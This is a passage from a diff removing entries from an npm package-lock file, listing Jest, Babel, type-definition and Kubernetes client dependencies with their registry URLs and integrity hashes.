"callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "dependencies": { - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - } - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.5.tgz", - "integrity": "sha512-WXCyOcRtH37HAUkpXhUduaxdm82b4GSlyTqajXviN4EfiuPgNYR109xMCKvpl6zPIpua0DGlMEDCq+g8EdoheQ==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "22.10.2", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", - "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "acorn": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", - "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", - "dev": true, - "peer": true - }, - "acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "requires": {} - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-colors": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.1.tgz", - "integrity": "sha512-JoX0apGbHaUJBNl6yF+p6JAFYZ666/hhCGKN5t9QFjbJQKUU/g8MNbFDbvfrgKXvI1QpZplPOnwIo99lX/AAmA==", - "dev": true, - "peer": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - }, - "dependencies": { - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - } - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "astral-regex": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", - "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", - "dev": true, - "peer": true - }, - "async": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", - "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.23.0", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.23.0.tgz", - "integrity": "sha512-QW8HiM1shhT2GuzkvklfjcKDiWFXHOeFCIA/huJPwHsslwcydgk7X+z2zXpEijP98UCY7HbubZt5J2Zgvf0CaQ==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001587", - "electron-to-chromium": "^1.4.668", - "node-releases": "^2.0.14", - "update-browserslist-db": "^1.0.13" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001610", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001610.tgz", - "integrity": "sha512-QFutAY4NgaelojVMjY63o6XlZyORPaLfyMnsl3HgnWdJUcX6K0oaJymHjH8PT5Gk7sTm8rvC/c5COUQKXqmOMA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": 